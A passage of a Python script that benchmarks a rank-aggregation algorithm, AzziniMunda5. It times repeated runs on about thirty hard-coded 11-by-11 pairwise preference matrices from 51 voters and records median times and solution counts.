[30,0,30,31,20,22,20,29,33,29,40],
[37,21,0,34,22,19,31,10,30,23,34],
[31,20,17,0,23,14,23,10,25,18,16],
[34,31,29,28,0,34,23,29,25,34,37],
[43,29,32,37,17,0,23,29,25,29,37],
[31,31,20,28,28,28,0,27,17,18,21],
[30,22,41,41,22,22,24,0,38,25,41],
[26,18,21,26,26,26,34,13,0,20,18],
[33,22,28,33,17,22,33,26,31,0,33],
[22,11,17,35,14,14,30,10,33,18,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 164, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,17,34,25,26,10,23,31,8,9],
[23,0,20,41,22,27,13,35,34,24,11],
[34,31,0,41,18,31,28,45,32,36,40],
[17,10,10,0,1,13,8,30,20,10,9],
[26,29,33,50,0,28,13,34,34,33,32],
[25,24,20,38,23,0,10,33,30,21,24],
[41,38,23,43,38,41,0,43,30,37,47],
[28,16,6,21,17,18,8,0,32,6,22],
[20,17,19,31,17,21,21,19,0,19,18],
[43,27,15,41,18,30,14,45,32,0,32],
[42,40,11,42,19,27,4,29,33,19,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 165, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,20,16,25,21,22,24,26,23,26],
[32,0,24,27,28,26,25,31,25,28,23],
[31,27,0,25,26,20,24,26,23,27,26],
[35,24,26,0,22,22,26,30,26,29,30],
[26,23,25,29,0,24,27,24,25,26,26],
[30,25,31,29,27,0,26,28,27,32,25],
[29,26,27,25,24,25,0,27,24,24,29],
[27,20,25,21,27,23,24,0,25,24,21],
[25,26,28,25,26,24,27,26,0,23,26],
[28,23,24,22,25,19,27,27,28,0,26],
[25,28,25,21,25,26,22,30,25,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 166, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,22,20,20,21,19,18,27,19,26,16],
[29,0,21,19,23,22,25,24,21,27,21],
[31,30,0,27,29,27,19,27,20,34,27],
[31,32,24,0,23,28,24,28,24,31,25],
[30,28,22,28,0,23,19,27,19,34,22],
[32,29,24,23,28,0,28,29,30,32,27],
[33,26,32,27,32,23,0,32,23,32,25],
[24,27,24,23,24,22,19,0,23,27,18],
[32,30,31,27,32,21,28,28,0,33,27],
[25,24,17,20,17,19,19,24,18,0,18],
[35,30,24,26,29,24,26,33,24,33,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 167, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,21,21,17,26,22,19,35,21,24,26],
[30,0,23,25,24,28,28,37,27,28,29],
[30,28,0,26,22,22,28,26,28,24,22],
[34,26,25,0,26,21,31,33,30,32,28],
[25,27,29,25,0,15,22,30,22,22,18],
[29,23,29,30,36,0,28,40,25,27,32],
[32,23,23,20,29,23,0,27,29,24,20],
[16,14,25,18,21,11,24,0,17,27,17],
[30,24,23,21,29,26,22,34,0,27,24],
[27,23,27,19,29,24,27,24,24,0,24],
[25,22,29,23,33,19,31,34,27,27,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 168, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,33,21,27,25,30,36,34,51,32],
[32,0,33,24,47,30,30,41,30,47,28],
[18,18,0,21,27,10,19,27,10,31,19],
[30,27,30,0,40,32,27,32,23,36,40],
[24,4,24,11,0,34,17,20,25,30,23],
[26,21,41,19,17,0,23,26,17,30,32],
[21,21,32,24,34,28,0,30,17,21,23],
[15,10,24,19,31,25,21,0,25,38,14],
[17,21,41,28,26,34,34,26,0,27,36],
[0,4,20,15,21,21,30,13,24,0,19],
[19,23,32,11,28,19,28,37,15,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 169, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,19,30,27,30,26,30,25,27,30],
[24,0,25,28,24,27,26,31,26,33,28],
[32,26,0,24,23,32,30,34,28,25,31],
[21,23,27,0,23,27,26,31,25,26,29],
[24,27,28,28,0,29,25,32,26,30,35],
[21,24,19,24,22,0,24,28,23,28,28],
[25,25,21,25,26,27,0,26,27,28,27],
[21,20,17,20,19,23,25,0,22,26,25],
[26,25,23,26,25,28,24,29,0,25,33],
[24,18,26,25,21,23,23,25,26,0,28],
[21,23,20,22,16,23,24,26,18,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 170, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,24,27,28,34,32,34,31,29,22],
[22,0,24,26,28,28,29,27,30,28,23],
[27,27,0,28,27,32,24,28,37,28,28],
[24,25,23,0,23,31,24,32,27,26,25],
[23,23,24,28,0,26,27,31,27,20,17],
[17,23,19,20,25,0,21,30,27,22,20],
[19,22,27,27,24,30,0,34,30,25,23],
[17,24,23,19,20,21,17,0,24,17,15],
[20,21,14,24,24,24,21,27,0,22,19],
[22,23,23,25,31,29,26,34,29,0,25],
[29,28,23,26,34,31,28,36,32,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 171, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,38,28,22,29,30,30,31,26,30],
[28,0,29,29,23,31,24,29,31,27,34],
[13,22,0,19,11,19,26,15,14,11,24],
[23,22,32,0,23,25,28,23,24,19,26],
[29,28,40,28,0,25,28,33,25,24,32],
[22,20,32,26,26,0,30,31,25,19,31],
[21,27,25,23,23,21,0,22,24,21,22],
[21,22,36,28,18,20,29,0,24,22,23],
[20,20,37,27,26,26,27,27,0,24,28],
[25,24,40,32,27,32,30,29,27,0,36],
[21,17,27,25,19,20,29,28,23,15,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 172, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,35,24,35,35,27,27,51,27,35],
[28,0,51,24,51,23,27,35,39,35,23],
[16,0,0,0,11,0,12,11,24,12,11],
[27,27,51,0,39,31,23,39,39,39,31],
[16,0,40,12,0,4,12,11,28,12,15],
[16,28,51,20,47,0,12,39,51,39,27],
[24,24,39,28,39,39,0,39,39,51,39],
[24,16,40,12,40,12,12,0,28,28,23],
[0,12,27,12,23,0,12,23,0,12,11],
[24,16,39,12,39,12,0,23,39,0,23],
[16,28,40,20,36,24,12,28,40,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 173, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,15,17,24,20,22,14,20,26,23,17],
[36,0,20,29,28,23,25,24,30,30,28],
[34,31,0,34,17,28,27,26,30,33,32],
[27,22,17,0,17,19,19,24,27,21,22],
[31,23,34,34,0,27,23,29,34,30,29],
[29,28,23,32,24,0,19,24,32,24,22],
[37,26,24,32,28,32,0,31,35,32,28],
[31,27,25,27,22,27,20,0,31,19,22],
[25,21,21,24,17,19,16,20,0,21,22],
[28,21,18,30,21,27,19,32,30,0,23],
[34,23,19,29,22,29,23,29,29,28,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 174, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,17,17,17,17,9,26,11,16,18,20],
[34,0,28,26,20,30,41,24,27,24,32],
[34,23,0,24,25,22,24,20,25,32,23],
[34,25,27,0,24,24,32,21,28,32,30],
[34,31,26,27,0,22,35,21,20,29,29],
[42,21,29,27,29,0,26,27,19,28,30],
[25,10,27,19,16,25,0,22,18,22,26],
[40,27,31,30,30,24,29,0,21,25,30],
[35,24,26,23,31,32,33,30,0,28,29],
[33,27,19,19,22,23,29,26,23,0,25],
[31,19,28,21,22,21,25,21,22,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 175, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,34,33,27,29,32,34,30,31,24,26],
[17,0,22,15,19,23,28,23,23,21,22],
[18,29,0,18,18,20,24,21,24,19,21],
[24,36,33,0,31,30,25,31,28,26,28],
[22,32,33,20,0,28,27,25,27,25,27],
[19,28,31,21,23,0,27,18,25,23,24],
[17,23,27,26,24,24,0,26,20,26,24],
[21,28,30,20,26,33,25,0,26,23,27],
[20,28,27,23,24,26,31,25,0,25,32],
[27,30,32,25,26,28,25,28,26,0,25],
[25,29,30,23,24,27,27,24,19,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 176, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,25,35,22,31,31,33,36,24,29],
[26,0,33,34,28,26,31,18,33,30,32],
[26,18,0,29,22,18,26,18,24,18,21],
[16,17,22,0,28,20,19,14,21,17,19],
[29,23,29,23,0,32,37,21,36,20,27],
[20,25,33,31,19,0,27,16,35,27,21],
[20,20,25,32,14,24,0,12,22,15,17],
[18,33,33,37,30,35,39,0,37,33,27],
[15,18,27,30,15,16,29,14,0,27,21],
[27,21,33,34,31,24,36,18,24,0,27],
[22,19,30,32,24,30,34,24,30,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 177, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,31,29,30,31,28,25,26,27,25],
[24,0,29,29,28,23,28,28,27,29,18],
[20,22,0,22,23,23,21,23,14,19,18],
[22,22,29,0,26,28,26,27,24,26,22],
[21,23,28,25,0,32,26,24,19,23,25],
[20,28,28,23,19,0,25,24,22,22,21],
[23,23,30,25,25,26,0,22,26,25,22],
[26,23,28,24,27,27,29,0,25,23,25],
[25,24,37,27,32,29,25,26,0,30,26],
[24,22,32,25,28,29,26,28,21,0,27],
[26,33,33,29,26,30,29,26,25,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 178, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,19,23,24,27,26,29,30,20,22,26],
[32,0,26,31,36,26,25,29,24,31,26],
[28,25,0,26,27,25,22,24,24,31,27],
[27,20,25,0,22,22,22,26,28,29,24],
[24,15,24,29,0,26,23,28,20,30,20],
[25,25,26,29,25,0,25,27,29,27,28],
[22,26,29,29,28,26,0,30,28,33,28],
[21,22,27,25,23,24,21,0,22,30,24],
[31,27,27,23,31,22,23,29,0,28,24],
[29,20,20,22,21,24,18,21,23,0,21],
[25,25,24,27,31,23,23,27,27,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 179, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,33,42,33,34,31,18,20,40,33,39],
[18,0,20,26,32,35,18,26,26,35,24],
[9,31,0,19,29,37,18,26,26,28,17],
[18,25,32,0,23,23,18,29,35,31,20],
[17,19,22,28,0,26,18,15,15,8,17],
[20,16,14,28,25,0,18,26,37,30,28],
[33,33,33,33,33,33,0,20,31,33,39],
[31,25,25,22,36,25,31,0,40,25,31],
[11,25,25,16,36,14,20,11,0,20,31],
[18,16,23,20,43,21,18,26,31,0,29],
[12,27,34,31,34,23,12,20,20,22,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 180, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,16,29,21,33,19,24,33,21,15,18],
[35,0,36,28,44,38,26,37,23,28,26],
[22,15,0,16,21,20,16,21,14,17,14],
[30,23,35,0,30,34,32,30,29,29,25],
[18,7,30,21,0,28,19,30,21,17,24],
[32,13,31,17,23,0,17,22,23,20,17],
[27,25,35,19,32,34,0,30,19,19,18],
[18,14,30,21,21,29,21,0,26,21,19],
[30,28,37,22,30,28,32,25,0,25,24],
[36,23,34,22,34,31,32,30,26,0,20],
[33,25,37,26,27,34,33,32,27,31,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 181, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,17,20,19,23,16,30,28,22,16],
[27,0,20,20,26,27,24,30,25,26,23],
[34,31,0,26,28,31,25,34,36,28,26],
[31,31,25,0,24,22,21,27,31,25,20],
[32,25,23,27,0,30,22,27,32,27,25],
[28,24,20,29,21,0,25,28,27,26,19],
[35,27,26,30,29,26,0,29,28,27,20],
[21,21,17,24,24,23,22,0,27,23,14],
[23,26,15,20,19,24,23,24,0,23,14],
[29,25,23,26,24,25,24,28,28,0,21],
[35,28,25,31,26,32,31,37,37,30,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 182, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,24,17,11,18,24,12,24,21,18,18],
[27,0,27,14,23,29,22,26,16,22,21],
[34,24,0,19,27,24,22,29,22,22,26],
[40,37,32,0,30,32,26,35,22,33,31],
[33,28,24,21,0,28,27,34,21,24,26],
[27,22,27,19,23,0,16,23,19,20,22],
[39,29,29,25,24,35,0,28,25,25,25],
[27,25,22,16,17,28,23,0,21,22,21],
[30,35,29,29,30,32,26,30,0,29,24],
[33,29,29,18,27,31,26,29,22,0,26],
[33,30,25,20,25,29,26,30,27,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 183, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,26,28,27,25,24,33,22,20,22],
[28,0,28,28,30,28,24,36,28,28,25],
[25,23,0,28,25,20,19,29,22,22,18],
[23,23,23,0,24,25,24,29,21,17,23],
[24,21,26,27,0,24,28,24,25,27,24],
[26,23,31,26,27,0,24,29,24,29,28],
[27,27,32,27,23,27,0,29,24,23,25],
[18,15,22,22,27,22,22,0,21,20,14],
[29,23,29,30,26,27,27,30,0,27,24],
[31,23,29,34,24,22,28,31,24,0,28],
[29,26,33,28,27,23,26,37,27,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 184, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,24,27,22,25,21,27,24,30,31],
[26,0,27,24,23,31,21,24,25,28,32],
[27,24,0,25,26,28,27,24,25,29,31],
[24,27,26,0,28,30,23,29,27,28,31],
[29,28,25,23,0,34,25,27,23,28,29],
[26,20,23,21,17,0,22,26,20,26,25],
[30,30,24,28,26,29,0,25,28,27,30],
[24,27,27,22,24,25,26,0,23,26,29],
[27,26,26,24,28,31,23,28,0,27,27],
[21,23,22,23,23,25,24,25,24,0,25],
[20,19,20,20,22,26,21,22,24,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 185, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,29,22,25,29,23,26,29,25,17,27],
[22,0,20,20,22,23,20,27,25,18,23],
[29,31,0,26,33,28,24,31,26,18,31],
[26,31,25,0,31,25,24,26,26,22,27],
[22,29,18,20,0,20,22,19,20,21,27],
[28,28,23,26,31,0,29,28,23,22,22],
[25,31,27,27,29,22,0,26,28,25,27],
[22,24,20,25,32,23,25,0,25,26,28],
[26,26,25,25,31,28,23,26,0,24,25],
[34,33,33,29,30,29,26,25,27,0,27],
[24,28,20,24,24,29,24,23,26,24,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 186, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,28,28,27,26,21,23,19,25,26],
[23,0,24,19,27,20,21,16,18,24,19],
[23,27,0,24,30,19,21,17,24,24,21],
[23,32,27,0,32,22,23,17,25,25,22],
[24,24,21,19,0,20,20,18,19,24,17],
[25,31,32,29,31,0,21,21,21,25,18],
[30,30,30,28,31,30,0,25,24,28,28],
[28,35,34,34,33,30,26,0,25,30,26],
[32,33,27,26,32,30,27,26,0,26,22],
[26,27,27,26,27,26,23,21,25,0,19],
[25,32,30,29,34,33,23,25,29,32,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 187, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,28,33,25,32,34,31,28,23,28,31],
[23,0,32,28,27,31,31,25,25,18,29],
[18,19,0,21,28,26,28,31,23,25,24],
[26,23,30,0,29,31,23,35,19,17,30],
[19,24,23,22,0,14,23,18,19,19,19],
[17,20,25,20,37,0,31,32,29,21,27],
[20,20,23,28,28,20,0,24,23,20,25],
[23,26,20,16,33,19,27,0,24,25,25],
[28,26,28,32,32,22,28,27,0,31,32],
[23,33,26,34,32,30,31,26,20,0,28],
[20,22,27,21,32,24,26,26,19,23,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 188, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,23,28,23,24,23,29,25,30,26,27],
[28,0,31,31,33,28,23,27,29,24,35],
[23,20,0,17,20,18,18,12,15,21,25],
[28,20,34,0,26,28,26,25,25,29,31],
[27,18,31,25,0,26,29,19,22,24,30],
[28,23,33,23,25,0,29,20,23,20,32],
[22,28,33,25,22,22,0,20,21,27,35],
[26,24,39,26,32,31,31,0,25,27,30],
[21,22,36,26,29,28,30,26,0,26,30],
[25,27,30,22,27,31,24,24,25,0,31],
[24,16,26,20,21,19,16,21,21,20,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 189, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,26,28,31,35,29,24,28,27,26],
[26,0,25,27,31,34,25,28,30,29,28],
[25,26,0,27,30,30,26,33,27,27,28],
[23,24,24,0,33,33,28,29,31,26,30],
[20,20,21,18,0,25,21,22,19,22,20],
[16,17,21,18,26,0,24,25,24,21,19],
[22,26,25,23,30,27,0,24,28,21,25],
[27,23,18,22,29,26,27,0,26,26,26],
[23,21,24,20,32,27,23,25,0,29,18],
[24,22,24,25,29,30,30,25,22,0,25],
[25,23,23,21,31,32,26,25,33,26,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 190, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,31,30,28,33,27,30,25,30,29],
[24,0,25,26,22,24,26,24,28,28,24],
[20,26,0,26,25,23,24,23,26,26,20],
[21,25,25,0,25,28,25,22,26,27,26],
[23,29,26,26,0,27,25,24,25,28,28],
[18,27,28,23,24,0,27,21,24,26,29],
[24,25,27,26,26,24,0,26,25,28,24],
[21,27,28,29,27,30,25,0,27,30,27],
[26,23,25,25,26,27,26,24,0,27,28],
[21,23,25,24,23,25,23,21,24,0,20],
[22,27,31,25,23,22,27,24,23,31,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 191, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,25,23,27,25,24,26,25,25,23,23],
[26,0,22,26,25,24,25,31,29,27,24],
[28,29,0,27,24,25,27,29,26,26,24],
[24,25,24,0,21,25,21,26,24,23,24],
[26,26,27,30,0,24,29,25,28,23,29],
[27,27,26,26,27,0,24,30,30,29,28],
[25,26,24,30,22,27,0,28,25,27,22],
[26,20,22,25,26,21,23,0,26,23,22],
[26,22,25,27,23,21,26,25,0,19,24],
[28,24,25,28,28,22,24,28,32,0,26],
[28,27,27,27,22,23,29,29,27,25,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 192, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,31,29,25,28,38,39,33,32,33,30],
[20,0,26,36,27,33,39,22,24,25,16],
[22,25,0,23,22,33,36,22,32,33,24],
[26,15,28,0,24,33,39,25,22,33,20],
[23,24,29,27,0,30,32,25,20,23,19],
[13,18,18,18,21,0,25,23,18,20,16],
[12,12,15,12,19,26,0,18,17,17,19],
[18,29,29,26,26,28,33,0,28,32,20],
[19,27,19,29,31,33,34,23,0,23,19],
[18,26,18,18,28,31,34,19,28,0,17],
[21,35,27,31,32,35,32,31,32,34,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 193, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
[0,27,27,26,26,24,28,28,29,29,28],
[24,0,20,22,25,24,25,23,28,30,23],
[24,31,0,28,32,34,31,28,32,31,26],
[25,29,23,0,27,24,30,26,22,29,26],
[25,26,19,24,0,27,29,25,19,28,20],
[27,27,17,27,24,0,28,29,19,30,23],
[23,26,20,21,22,23,0,24,19,24,22],
[23,28,23,25,26,22,27,0,25,22,24],
[22,23,19,29,32,32,32,26,0,34,27],
[22,21,20,22,23,21,27,29,17,0,22],
[23,28,25,25,31,28,29,27,24,29,0]])
times = np.zeros(rep)
for i in range(rep):
# Algorithm with Condorcet winner
algorithm = alg.AzziniMunda5(om, float("inf"))
start_time = time.time()
sol = algorithm.execute()
t = (time.time() - start_time)
times[i] = t
#print(t)
exec_time = np.median(times)
result = np.append(np.array([11, 51, 194, "ME-BB", exec_time, sol.shape[0], algorithm.ntentative], dtype=np.dtype(object)), times)
print(result[:7])
results = np.vstack((results, result))
##############################################################
om = np.array([
